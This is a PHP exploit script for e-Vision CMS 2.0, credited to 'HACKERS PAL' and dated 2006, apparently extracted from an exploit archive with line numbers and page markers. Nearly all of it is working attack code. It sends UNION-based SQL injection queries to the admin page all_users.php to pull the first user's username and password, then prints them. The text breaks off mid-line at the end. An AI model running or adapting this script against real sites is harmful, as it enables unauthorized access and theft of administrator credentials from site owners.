1 #!/usr/bin/php −q −d short_open_tag=on
2 <?
3 /*
4 /* e−Vision CMS Remote sql injection exploit
5 /* By : HACKERS PAL
6 /* WwW.SoQoR.NeT
7 */
8 print_r(’
9
/**********************************************/
10
/* e−Vision CMS Remote sql injection exploit */
11
/* by HACKERS PAL <security@soqor.net> */
12
/* site: http://www.soqor.net */’);
13 if ($argc<2) {
14
print_r(’
15
/* −− */
16
/* Usage: php ’.$argv[0].’ host
17
/* Example: */
18
/* php ’.$argv[0].’ http://localhost/evision
19
/**********************************************/
20 ’);
21
die;
22 }
23 error_reporting(0);
24 ini_set("max_execution_time",0);
25 ini_set("default_socket_timeout",5);
26
27 $url=$argv[1];
28 $exploit="/admin/all_users.php?from=−1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*";
29 $exploit2="/admin/all_users.php?from=−1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*";
30
31 Function get_page($url)
32 {
33
34
if(function_exists("file_get_contents"))
35
{
36
37
$contents = file_get_contents($url);
38
39
}
40
else
41
{
42
$fp=fopen("$url","r");
43
while($line=fread($fp,1024))
44
{
45
$contents=$contents.$line;
46
}
47
48
49
}
50
return $contents;
51 }
52
Page 1/2
eVision CMS 2.0 all_users.php Remote SQL Injection Exploit
HACKERS PAL
09/22/2006
53 function get($var)
54 {
55
if(strlen($var[1])>0)
56
{
57
Echo trim($var[1]);
58
}
59 }
60
61 $page = get_page($url.$exploit);
62 $page2 = get_page($url.$exploit2);
63
64 if(preg_match(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,$page))
65 {
66
Echo "\n[+] User Name : ";
67
preg_replace_callback(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,’get’,$page);
68
Echo "\n[+] Pass Word : ";
69
preg_replace_callback(’/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is’,’get’,$page2);
70
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
71 }
72
73 Die("\n[−] Exploi